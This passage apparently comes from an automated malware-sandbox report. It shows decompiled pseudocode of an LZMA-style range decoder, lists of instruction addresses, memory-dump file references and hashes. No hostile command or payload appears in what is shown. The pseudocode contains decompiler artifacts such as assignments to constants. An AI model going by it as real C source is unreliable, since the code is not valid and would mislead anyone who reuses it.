						case 0x13:
							__eflags = _v68;
							if(_v68 != 0) {
								_t475 =  &_v92;
								 *_t475 = _v92 + 0x204;
								__eflags =  *_t475;
								_v52 = 0x10;
								_v68 = 8;
								L147:
								_v128 = 0x14;
								goto L148;
							}
							__eax = _v80;
							__ecx = _v92;
							__eax = _v80 << 4;
							_v52 = 8;
							__eax = _v92 + (_v80 << 4) + 0x104;
							L133:
							_v92 = __eax;
							_v68 = 3;
							goto L147;
						case 0x14:
							_v52 = _v52 + __ebx;
							__eax = _v132;
							goto L143;
						case 0x15:
							__eax = 0;
							__eflags = _v60 - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							_v60 = (__eflags >= 0) - 1 + 0xb;
							goto L123;
						case 0x16:
							__eax = _v52;
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx = _v8;
							_v68 = 6;
							__eax = __eax << 7;
							_v128 = 0x19;
							_v92 = __eax;
							goto L148;
						case 0x17:
							L148:
							__eax = _v68;
							_v84 = 1;
							_v76 = _v68;
							goto L152;
						case 0x18:
							L149:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x18;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t490 =  &_v116;
							 *_t490 = _v116 + 1;
							__eflags =  *_t490;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L151:
							_t493 =  &_v76;
							 *_t493 = _v76 - 1;
							__eflags =  *_t493;
							L152:
							__eflags = _v76;
							if(_v76 <= 0) {
								__ecx = _v68;
								__ebx = _v84;
								0 = 1;
								__eax = 1 << __cl;
								__ebx = _v84 - (1 << __cl);
								__eax = _v128;
								_v72 = __ebx;
								L143:
								_v140 = _t561;
								goto L3;
							}
							__eax = _v84;
							_v20 = _v20 >> 0xb;
							__edx = _v84 + _v84;
							__eax = _v92;
							__esi = __edx + __eax;
							_v88 = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								_v84 = __edx;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								_v84 = _v84 << 1;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L151;
							} else {
								goto L149;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								_v48 = __ebx;
								L122:
								_t399 =  &_v48;
								 *_t399 = _v48 + 1;
								__eflags =  *_t399;
								L123:
								__eax = _v48;
								__eflags = __eax;
								if(__eax == 0) {
									_v52 = _v52 | 0xffffffff;
									goto L173;
								}
								__eflags = __eax - _v100;
								if(__eax > _v100) {
									goto L174;
								}
								_v52 = _v52 + 2;
								__eax = _v52;
								_t406 =  &_v100;
								 *_t406 = _v100 + _v52;
								__eflags =  *_t406;
								goto L126;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							_v48 = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								_v76 = __ecx;
								L105:
								__eflags = _v76;
								if(_v76 <= 0) {
									__eax = __eax + __ebx;
									_v68 = 4;
									_v48 = __eax;
									__eax = _v8;
									__eax = _v8 + 0x644;
									__eflags = __eax;
									L111:
									__ebx = 0;
									_v92 = __eax;
									_v84 = 1;
									_v72 = 0;
									_v76 = 0;
									L115:
									__eax = _v68;
									__eflags = _v76 - _v68;
									if(_v76 >= _v68) {
										_t397 =  &_v48;
										 *_t397 = _v48 + __ebx;
										__eflags =  *_t397;
										goto L122;
									}
									__eax = _v84;
									_v20 = _v20 >> 0xb;
									__edi = _v84 + _v84;
									__eax = _v92;
									__esi = __edi + __eax;
									_v88 = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = (_v20 >> 0xb) * __ecx;
									__eflags = _v16 - __edx;
									if(_v16 >= __edx) {
										__ecx = 0;
										_v20 = _v20 - __edx;
										__ecx = 1;
										_v16 = _v16 - __edx;
										__ebx = 1;
										__ecx = _v76;
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx = _v72;
										__ebx = _v72 | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										_v72 = __ebx;
										 *__esi = __ax;
										_v84 = __edi;
									} else {
										_v20 = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										_v84 = _v84 << 1;
										 *__esi = __dx;
									}
									__eflags = _v20 - 0x1000000;
									if(_v20 >= 0x1000000) {
										L114:
										_t374 =  &_v76;
										 *_t374 = _v76 + 1;
										__eflags =  *_t374;
										goto L115;
									} else {
										goto L112;
									}
								}
								__ecx = _v16;
								__ebx = __ebx + __ebx;
								_v20 = _v20 >> 1;
								__eflags = _v16 - _v20;
								_v72 = __ebx;
								if(_v16 >= _v20) {
									__ecx = _v20;
									_v16 = _v16 - _v20;
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									_v72 = __ebx;
								}
								__eflags = _v20 - 0x1000000;
								if(_v20 >= 0x1000000) {
									L104:
									_t344 =  &_v76;
									 *_t344 = _v76 - 1;
									__eflags =  *_t344;
									goto L105;
								} else {
									goto L102;
								}
							}
							__edx = _v8;
							__eax = __eax - __ebx;
							_v68 = __ecx;
							__eax = _v8 + 0x55e + __eax * 2;
							goto L111;
						case 0x1a:
							L58:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1a;
								goto L173;
							}
							__ecx = _v108;
							__al = _v96;
							__edx = _v12;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_v104 = _v104 - 1;
							 *_v108 = __al;
							__ecx = _v24;
							 *(_v12 + __ecx) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t197 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t197;
							goto L82;
						case 0x1b:
							L78:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1b;
								goto L173;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__edx = _v12;
							__cl =  *(__edx + __eax);
							__eax = _v24;
							_v96 = __cl;
							 *(__edx + __eax) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t280 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t280;
							__eax = _v108;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_t289 =  &_v104;
							 *_t289 = _v104 - 1;
							__eflags =  *_t289;
							 *_v108 = __cl;
							L82:
							_v24 = __edx;
							goto L83;
						case 0x1c:
							while(1) {
								L126:
								__eflags = _v104;
								if(_v104 == 0) {
									break;
								}
								__eax = _v24;
								__eax = _v24 - _v48;
								__eflags = __eax - _v120;
								if(__eax >= _v120) {
									__eax = __eax + _v120;
									__eflags = __eax;
								}
								__edx = _v12;
								__cl =  *(__edx + __eax);
								__eax = _v24;
								_v96 = __cl;
								 *(__edx + __eax) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t420 = __eax % _v120;
								__eax = __eax / _v120;
								__edx = _t420;
								__eax = _v108;
								_v108 = _v108 + 1;
								_v104 = _v104 - 1;
								_v52 = _v52 - 1;
								__eflags = _v52;
								 *_v108 = __cl;
								_v24 = _t420;
								if(_v52 > 0) {
									continue;
								} else {
									L83:
									_v140 = 2;
									goto L3;
								}
							}
							_v140 = 0x1c;
							L173:
							_push(0x22);
							_pop(_t574);
							memcpy(_v148,  &_v140, _t574 << 2);
							return 0;
					}
				}
				L174:
				_t538 = _t537 | 0xffffffff;
				return _t538;
			}










































                                          0x00406786
                                          0x0040678d
                                          0x00406793
                                          0x00406799
                                          0x00000000
                                          0x0040679d
                                          0x004067a9
                                          0x004067a9
                                          0x004067a9
                                          0x004067b2
                                          0x00000000
                                          0x00000000
                                          0x004067b8
                                          0x00000000
                                          0x004067bf
                                          0x004067c3
                                          0x00000000
                                          0x00000000
                                          0x004067cc
                                          0x004067cf
                                          0x004067d2
                                          0x004067d4
                                          0x004067d6
                                          0x00000000
                                          0x00000000
                                          0x004067dc
                                          0x004067df
                                          0x004067e1
                                          0x004067e2
                                          0x004067e5
                                          0x004067e7
                                          0x004067e8
                                          0x004067ea
                                          0x004067ed
                                          0x004067f2
                                          0x004067f7
                                          0x00406800
                                          0x00406813
                                          0x00406816
                                          0x0040681f
                                          0x00406822
                                          0x0040684a
                                          0x0040684a
                                          0x0040684c
                                          0x0040685a
                                          0x0040685a
                                          0x0040685e
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0040684e
                                          0x0040684e
                                          0x00406851
                                          0x00406851
                                          0x00406852
                                          0x00406852
                                          0x00000000
                                          0x0040684e
                                          0x00406824
                                          0x00406828
                                          0x0040682d
                                          0x0040682d
                                          0x00406836
                                          0x0040683c
                                          0x0040683e
                                          0x00406841
                                          0x00000000
                                          0x00406847
                                          0x00406847
                                          0x00000000
                                          0x00406847
                                          0x00000000
                                          0x00406864
                                          0x00406864
                                          0x00406868
                                          0x00407114
                                          0x00000000
                                          0x00407114
                                          0x00406871
                                          0x00406881
                                          0x00406884
                                          0x00406887
                                          0x00406887
                                          0x00406887
                                          0x0040688a
                                          0x0040688a
                                          0x0040688e
                                          0x00000000
                                          0x00000000
                                          0x00406890
                                          0x00406893
                                          0x00406896
                                          0x004068c0
                                          0x004068c6
                                          0x004068cd
                                          0x00000000
                                          0x004068cd
                                          0x00406898
                                          0x0040689c
                                          0x0040689f
                                          0x004068a4
                                          0x004068a4
                                          0x004068af
                                          0x004068b5
                                          0x004068b7
                                          0x004068ba
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x004068ff
                                          0x00406905
                                          0x00406908
                                          0x00406915
                                          0x0040691d
                                          0x00000000
                                          0x00000000
                                          0x004068d4
                                          0x004068d4
                                          0x004068d8
                                          0x00407123
                                          0x00000000
                                          0x00407123
                                          0x004068e4
                                          0x004068ef
                                          0x004068ef
                                          0x004068ef
                                          0x004068f2
                                          0x004068f5
                                          0x004068f8
                                          0x004068fb
                                          0x004068fd
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00406f94
                                          0x00406f94
                                          0x00406f9a
                                          0x00406fa0
                                          0x00406fa3
                                          0x00406fa6
                                          0x00406fc0
                                          0x00406fc3
                                          0x00406fc9
                                          0x00406fd4
                                          0x00406fd4
                                          0x00406fd6
                                          0x00406fa8
                                          0x00406fa8
                                          0x00406fb7
                                          0x00406fbb
                                          0x00406fbb
                                          0x00406fd9
                                          0x00406fe0
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00406fe2
                                          0x00406fe2
                                          0x00406fe6
                                          0x00407195
                                          0x00000000
                                          0x00407195
                                          0x00406ff2
                                          0x00406ff9
                                          0x00407001
                                          0x00407001
                                          0x00407001
                                          0x00407004
                                          0x00407007
                                          0x00407007
                                          0x00000000
                                          0x00000000
                                          0x00406925
                                          0x00406927
                                          0x0040692a
                                          0x0040699b
                                          0x0040699e
                                          0x004069a1
                                          0x004069a8
                                          0x004069b2
                                          0x00000000
                                          0x004069b2
                                          0x0040692c
                                          0x00406930
                                          0x00406933
                                          0x00406935
                                          0x00406938
                                          0x0040693b
                                          0x0040693d
                                          0x00406940
                                          0x00406942
                                          0x00406947
                                          0x0040694a
                                          0x0040694d
                                          0x00406951
                                          0x00406958
                                          0x0040695b
                                          0x00406962
                                          0x00406966
                                          0x0040696e
                                          0x0040696e
                                          0x0040696e
                                          0x00406968
                                          0x00406968
                                          0x00406968
                                          0x0040695d
                                          0x0040695d
                                          0x0040695d
                                          0x00406972
                                          0x00406975
                                          0x00406993
                                          0x00406995
                                          0x00000000
                                          0x00406995
                                          0x00406977
                                          0x0040697a
                                          0x0040697d
                                          0x00406980
                                          0x00406982
                                          0x00406982
                                          0x00406982
                                          0x00406985
                                          0x00406988
                                          0x0040698a
                                          0x0040698b
                                          0x0040698e
                                          0x00000000
                                          0x00000000
                                          0x00406bc4
                                          0x00406bc8
                                          0x00406be6
                                          0x00406be9
                                          0x00406bf0
                                          0x00406bf3
                                          0x00406bf6
                                          0x00406bf9
                                          0x00406bfc
                                          0x00406bff
                                          0x00406c01
                                          0x00406c08
                                          0x00406c09
                                          0x00406c0b
                                          0x00406c0e
                                          0x00406c11
                                          0x00406c14
                                          0x00406c14
                                          0x00406c19
                                          0x00000000
                                          0x00406c19
                                          0x00406bca
                                          0x00406bcd
                                          0x00406bd0
                                          0x00406bda
                                          0x00000000
                                          0x00000000
                                          0x00406c2e
                                          0x00406c32
                                          0x00406c55
                                          0x00406c58
                                          0x00406c5b
                                          0x00406c65
                                          0x00406c34
                                          0x00406c34
                                          0x00406c37
                                          0x00406c3a
                                          0x00406c3d
                                          0x00406c4a
                                          0x00406c4d
                                          0x00406c4d
                                          0x00000000
                                          0x00000000
                                          0x00406c71
                                          0x00406c75
                                          0x00000000
                                          0x00000000
                                          0x00406c7b
                                          0x00406c7f
                                          0x00000000
                                          0x00000000
                                          0x00406c85
                                          0x00406c87
                                          0x00406c8b
                                          0x00406c8b
                                          0x00406c8e
                                          0x00406c92
                                          0x00000000
                                          0x00000000
                                          0x00406ce2
                                          0x00406ce6
                                          0x00406ced
                                          0x00406cf0
                                          0x00406cf3
                                          0x00406cfd
                                          0x00000000
                                          0x00406cfd
                                          0x00406ce8
                                          0x00000000
                                          0x00000000
                                          0x00406d09
                                          0x00406d0d
                                          0x00406d14
                                          0x00406d17
                                          0x00406d1a
                                          0x00406d0f
                                          0x00406d0f
                                          0x00406d0f
                                          0x00406d1d
                                          0x00406d20
                                          0x00406d23
                                          0x00406d23
                                          0x00406d26
                                          0x00406d29
                                          0x00406d2c
                                          0x00406d2c
                                          0x00406d2f
                                          0x00406d36
                                          0x00406d3b
                                          0x00000000
                                          0x00000000
                                          0x00406dc9
                                          0x00406dc9
                                          0x00406dcd
                                          0x0040716b
                                          0x00000000
                                          0x0040716b
                                          0x00406dd3
                                          0x00406dd6
                                          0x00406dd9
                                          0x00406ddd
                                          0x00406de0
                                          0x00406de6
                                          0x00406de8
                                          0x00406de8
                                          0x00406de8
                                          0x00406deb
                                          0x00406dee
                                          0x00000000
                                          0x00000000
                                          0x004069be
                                          0x004069be
                                          0x004069c2
                                          0x0040712f
                                          0x00000000
                                          0x0040712f
                                          0x004069c8
                                          0x004069cb
                                          0x004069ce
                                          0x004069d2
                                          0x004069d5
                                          0x004069db
                                          0x004069dd
                                          0x004069dd
                                          0x004069dd
                                          0x004069e0
                                          0x004069e3
                                          0x004069e3
                                          0x004069e6
                                          0x004069e9
                                          0x00000000
                                          0x00000000
                                          0x004069ef
                                          0x004069f5
                                          0x00000000
                                          0x00000000
                                          0x004069fb
                                          0x004069fb
                                          0x004069ff
                                          0x00406a02
                                          0x00406a05
                                          0x00406a08
                                          0x00406a0b
                                          0x00406a0c
                                          0x00406a0f
                                          0x00406a11
                                          0x00406a17
                                          0x00406a1a
                                          0x00406a1d
                                          0x00406a20
                                          0x00406a23
                                          0x00406a26
                                          0x00406a29
                                          0x00406a45
                                          0x00406a48
                                          0x00406a4b
                                          0x00406a4e
                                          0x00406a55
                                          0x00406a59
                                          0x00406a5b
                                          0x00406a5f
                                          0x00406a2b
                                          0x00406a2b
                                          0x00406a2f
                                          0x00406a37
                                          0x00406a3c
                                          0x00406a3e
                                          0x00406a40
                                          0x00406a40
                                          0x00406a62
                                          0x00406a69
                                          0x00406a6c
                                          0x00000000
                                          0x00406a72
                                          0x00000000
                                          0x00406a72
                                          0x00000000
                                          0x00406a77
                                          0x00406a77
                                          0x00406a7b
                                          0x0040713b
                                          0x00000000
                                          0x0040713b
                                          0x00406a81
                                          0x00406a84
                                          0x00406a87
                                          0x00406a8b
                                          0x00406a8e
                                          0x00406a94
                                          0x00406a96
                                          0x00406a96
                                          0x00406a96
                                          0x00406a99
                                          0x00406a9c
                                          0x00406a9c
                                          0x00406a9c
                                          0x00406aa2
                                          0x00000000
                                          0x00000000
                                          0x00406aa4
                                          0x00406aa7
                                          0x00406aaa
                                          0x00406aad
                                          0x00406ab0
                                          0x00406ab3
                                          0x00406ab6
                                          0x00406ab9
                                          0x00406abc
                                          0x00406abf
                                          0x00406ac2
                                          0x00406ada
                                          0x00406add
                                          0x00406ae0
                                          0x00406ae3
                                          0x00406ae3
                                          0x00406ae6
                                          0x00406aea
                                          0x00406aec
                                          0x00406ac4
                                          0x00406ac4
                                          0x00406acc
                                          0x00406ad1
                                          0x00406ad3
                                          0x00406ad5
                                          0x00406ad5
                                          0x00406aef
                                          0x00406af6
                                          0x00406af9
                                          0x00000000
                                          0x00406afb
                                          0x00000000
                                          0x00406afb
                                          0x00406af9
                                          0x00406b00
                                          0x00406b00
                                          0x00406b00
                                          0x00406b00
                                          0x00000000
                                          0x00000000
                                          0x00406b3b
                                          0x00406b3b
                                          0x00406b3f
                                          0x00407147
                                          0x00000000
                                          0x00407147
                                          0x00406b45
                                          0x00406b48
                                          0x00406b4b
                                          0x00406b4f
                                          0x00406b52
                                          0x00406b58
                                          0x00406b5a
                                          0x00406b5a
                                          0x00406b5a
                                          0x00406b5d
                                          0x00406b60
                                          0x00406b60
                                          0x00406b66
                                          0x00406b04
                                          0x00406b04
                                          0x00406b07
                                          0x00000000
                                          0x00406b07
                                          0x00406b68
                                          0x00406b68
                                          0x00406b6b
                                          0x00406b6e
                                          0x00406b71
                                          0x00406b74
                                          0x00406b77
                                          0x00406b7a
                                          0x00406b7d
                                          0x00406b80
                                          0x00406b83
                                          0x00406b86
                                          0x00406b9e
                                          0x00406ba1
                                          0x00406ba4
                                          0x00406ba7
                                          0x00406ba7
                                          0x00406baa
                                          0x00406bae
                                          0x00406bb0
                                          0x00406b88
                                          0x00406b88
                                          0x00406b90
                                          0x00406b95
                                          0x00406b97
                                          0x00406b99
                                          0x00406b99
                                          0x00406bb3
                                          0x00406bba
                                          0x00406bbd
                                          0x00000000
                                          0x00406bbf
                                          0x00000000
                                          0x00406bbf
                                          0x00000000
                                          0x00406e4c
                                          0x00406e4c
                                          0x00406e50
                                          0x00407177
                                          0x00000000
                                          0x00407177
                                          0x00406e56
                                          0x00406e59
                                          0x00406e5c
                                          0x00406e60
                                          0x00406e63
                                          0x00406e69
                                          0x00406e6b
                                          0x00406e6b
                                          0x00406e6b
                                          0x00406e6e
                                          0x00000000
                                          0x00000000
                                          0x00406c1c
                                          0x00406c1c
                                          0x00406c1f
                                          0x00000000
                                          0x00000000
                                          0x00406f5b
                                          0x00406f5f
                                          0x00406f81
                                          0x00406f84
                                          0x00406f8e
                                          0x00406f91
                                          0x00406f91
                                          0x00000000
                                          0x00406f91
                                          0x00406f61
                                          0x00406f64
                                          0x00406f68
                                          0x00406f6b
                                          0x00406f6b
                                          0x00406f6e
                                          0x00000000
                                          0x00000000
                                          0x00407018
                                          0x0040701c
                                          0x0040703a
                                          0x0040703a
                                          0x0040703a
                                          0x00407041
                                          0x00407048
                                          0x0040704f
                                          0x0040704f
                                          0x00000000
                                          0x0040704f
                                          0x0040701e
                                          0x00407021
                                          0x00407024
                                          0x00407027
                                          0x0040702e
                                          0x00406f72
                                          0x00406f72
                                          0x00406f75
                                          0x00000000
                                          0x00000000
                                          0x00407109
                                          0x0040710c
                                          0x00000000
                                          0x00000000
                                          0x00406d43
                                          0x00406d45
                                          0x00406d4c
                                          0x00406d4d
                                          0x00406d4f
                                          0x00406d52
                                          0x00000000
                                          0x00000000
                                          0x00406d5a
                                          0x00406d5d
                                          0x00406d60
                                          0x00406d62
                                          0x00406d64
                                          0x00406d64
                                          0x00406d65
                                          0x00406d68
                                          0x00406d6f
                                          0x00406d72
                                          0x00406d80
                                          0x00000000
                                          0x00000000
                                          0x00407056
                                          0x00407056
                                          0x00407059
                                          0x00407060
                                          0x00000000
                                          0x00000000
                                          0x00407065
                                          0x00407065
                                          0x00407069
                                          0x004071a1
                                          0x00000000
                                          0x004071a1
                                          0x0040706f
                                          0x00407072
                                          0x00407075
                                          0x00407079
                                          0x0040707c
                                          0x00407082
                                          0x00407084
                                          0x00407084
                                          0x00407084
                                          0x00407087
                                          0x0040708a
                                          0x0040708a
                                          0x0040708a
                                          0x0040708a
                                          0x0040708d
                                          0x0040708d
                                          0x00407091
                                          0x004070f1
                                          0x004070f4
                                          0x004070f9
                                          0x004070fa
                                          0x004070fc
                                          0x004070fe
                                          0x00407101
                                          0x0040700d
                                          0x0040700d
                                          0x00000000
                                          0x0040700d
                                          0x00407093
                                          0x00407099
                                          0x0040709c
                                          0x0040709f
                                          0x004070a2
                                          0x004070a5
                                          0x004070a8
                                          0x004070ab
                                          0x004070ae
                                          0x004070b1
                                          0x004070b4
                                          0x004070cd
                                          0x004070d0
                                          0x004070d3
                                          0x004070d6
                                          0x004070da
                                          0x004070dc
                                          0x004070dc
                                          0x004070dd
                                          0x004070e0
                                          0x004070b6
                                          0x004070b6
                                          0x004070be
                                          0x004070c3
                                          0x004070c5
                                          0x004070c8
                                          0x004070c8
                                          0x004070e3
                                          0x004070ea
                                          0x00000000
                                          0x004070ec
                                          0x00000000
                                          0x004070ec
                                          0x00000000
                                          0x00406d88
                                          0x00406d8b
                                          0x00406dc1
                                          0x00406ef1
                                          0x00406ef1
                                          0x00406ef1
                                          0x00406ef1
                                          0x00406ef4
                                          0x00406ef4
                                          0x00406ef7
                                          0x00406ef9
                                          0x00407183
                                          0x00000000
                                          0x00407183
                                          0x00406eff
                                          0x00406f02
                                          0x00000000
                                          0x00000000
                                          0x00406f08
                                          0x00406f0c
                                          0x00406f0f
                                          0x00406f0f
                                          0x00406f0f
                                          0x00000000
                                          0x00406f0f
                                          0x00406d8d
                                          0x00406d8f
                                          0x00406d91
                                          0x00406d93
                                          0x00406d96
                                          0x00406d97
                                          0x00406d99
                                          0x00406d9b
                                          0x00406d9e
                                          0x00406da1
                                          0x00406db7
                                          0x00406dbc
                                          0x00406df4
                                          0x00406df4
                                          0x00406df8
                                          0x00406e24
                                          0x00406e26
                                          0x00406e2d
                                          0x00406e30
                                          0x00406e33
                                          0x00406e33
                                          0x00406e38
                                          0x00406e38
                                          0x00406e3a
                                          0x00406e3d
                                          0x00406e44
                                          0x00406e47
                                          0x00406e74
                                          0x00406e74
                                          0x00406e77
                                          0x00406e7a
                                          0x00406eee
                                          0x00406eee
                                          0x00406eee
                                          0x00000000
                                          0x00406eee
                                          0x00406e7c
                                          0x00406e82
                                          0x00406e85
                                          0x00406e88
                                          0x00406e8b
                                          0x00406e8e
                                          0x00406e91
                                          0x00406e94
                                          0x00406e97
                                          0x00406e9a
                                          0x00406e9d
                                          0x00406eb6
                                          0x00406eb8
                                          0x00406ebb
                                          0x00406ebc
                                          0x00406ebf
                                          0x00406ec1
                                          0x00406ec4
                                          0x00406ec6
                                          0x00406ec8
                                          0x00406ecb
                                          0x00406ecd
                                          0x00406ed0
                                          0x00406ed4
                                          0x00406ed6
                                          0x00406ed6
                                          0x00406ed7
                                          0x00406eda
                                          0x00406edd
                                          0x00406e9f
                                          0x00406e9f
                                          0x00406ea7
                                          0x00406eac
                                          0x00406eae
                                          0x00406eb1
                                          0x00406eb1
                                          0x00406ee0
                                          0x00406ee7
                                          0x00406e71
                                          0x00406e71
                                          0x00406e71
                                          0x00406e71
                                          0x00000000
                                          0x00406ee9
                                          0x00000000
                                          0x00406ee9
                                          0x00406ee7
                                          0x00406dfa
                                          0x00406dfd
                                          0x00406dff
                                          0x00406e02
                                          0x00406e05
                                          0x00406e08
                                          0x00406e0a
                                          0x00406e0d
                                          0x00406e10
                                          0x00406e10
                                          0x00406e13
                                          0x00406e13
                                          0x00406e16
                                          0x00406e1d
                                          0x00406df1
                                          0x00406df1
                                          0x00406df1
                                          0x00406df1
                                          0x00000000
                                          0x00406e1f
                                          0x00000000
                                          0x00406e1f
                                          0x00406e1d
                                          0x00406da3
                                          0x00406da6
                                          0x00406da8
                                          0x00406dab
                                          0x00000000
                                          0x00000000
                                          0x00406b0a
                                          0x00406b0a
                                          0x00406b0e
                                          0x00407153
                                          0x00000000
                                          0x00407153
                                          0x00406b14
                                          0x00406b17
                                          0x00406b1a
                                          0x00406b1d
                                          0x00406b20
                                          0x00406b23
                                          0x00406b26
                                          0x00406b28
                                          0x00406b2b
                                          0x00406b2e
                                          0x00406b31
                                          0x00406b33
                                          0x00406b33
                                          0x00406b33
                                          0x00000000
                                          0x00000000
                                          0x00406c95
                                          0x00406c95
                                          0x00406c99
                                          0x0040715f
                                          0x00000000
                                          0x0040715f
                                          0x00406c9f
                                          0x00406ca2
                                          0x00406ca5
                                          0x00406ca8
                                          0x00406caa
                                          0x00406caa
                                          0x00406caa
                                          0x00406cad
                                          0x00406cb0
                                          0x00406cb3
                                          0x00406cb6
                                          0x00406cb9
                                          0x00406cbc
                                          0x00406cbd
                                          0x00406cbf
                                          0x00406cbf
                                          0x00406cbf
                                          0x00406cc2
                                          0x00406cc5
                                          0x00406cc8
                                          0x00406ccb
                                          0x00406ccb
                                          0x00406ccb
                                          0x00406cce
                                          0x00406cd0
                                          0x00406cd0
                                          0x00000000
                                          0x00000000
                                          0x00406f12
                                          0x00406f12
                                          0x00406f12
                                          0x00406f16
                                          0x00000000
                                          0x00000000
                                          0x00406f1c
                                          0x00406f1f
                                          0x00406f22
                                          0x00406f25
                                          0x00406f27
                                          0x00406f27
                                          0x00406f27
                                          0x00406f2a
                                          0x00406f2d
                                          0x00406f30
                                          0x00406f33
                                          0x00406f36
                                          0x00406f39
                                          0x00406f3a
                                          0x00406f3c
                                          0x00406f3c
                                          0x00406f3c
                                          0x00406f3f
                                          0x00406f42
                                          0x00406f45
                                          0x00406f48
                                          0x00406f4b
                                          0x00406f4f
                                          0x00406f51
                                          0x00406f54
                                          0x00000000
                                          0x00406f56
                                          0x00406cd3
                                          0x00406cd3
                                          0x00000000
                                          0x00406cd3
                                          0x00406f54
                                          0x00407189
                                          0x004071ab
                                          0x004071b1
                                          0x004071b3
                                          0x004071ba
                                          0x00000000
                                          0x00000000
                                          0x004067b8
                                          0x004071c0
                                          0x004071c0
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.656113568.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.656098530.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656133616.0000000000408000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656142531.000000000040A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656152726.0000000000413000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656167614.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656175020.000000000042A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656182728.000000000042D000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4d3c90e2c2c281b0151b8bc02d48c609eaff53916cbf358625803cc36882de51
                                          • Instruction ID: 8282c7973928a3a8991f4aebeb421c6794774a39cdfa424cdd26f1de73b17733
                                          • Opcode Fuzzy Hash: 4d3c90e2c2c281b0151b8bc02d48c609eaff53916cbf358625803cc36882de51
                                          • Instruction Fuzzy Hash: 74816571D14228DBDF28CFA8C844BADBBB1FB44305F14816AD856BB2C1C7786A86DF45
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00406BC4, Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 98%
                                          			E00406BC4() {
				signed int _t539;
				unsigned short _t540;
				signed int _t541;
				void _t542;
				signed int _t543;
				signed int _t544;
				signed int _t573;
				signed int _t576;
				signed int _t597;
				signed int* _t614;
				void* _t621;

				L0:
				while(1) {
					L0:
					if( *(_t621 - 0x40) != 1) {
						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
						_t539 =  *(_t621 - 4) + 0x664;
						 *(_t621 - 0x58) = _t539;
						goto L68;
					} else {
						 *(__ebp - 0x84) = 8;
						while(1) {
							L132:
							 *(_t621 - 0x54) = _t614;
							while(1) {
								L133:
								_t540 =  *_t614;
								_t597 = _t540 & 0x0000ffff;
								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
								if( *(_t621 - 0xc) >= _t573) {
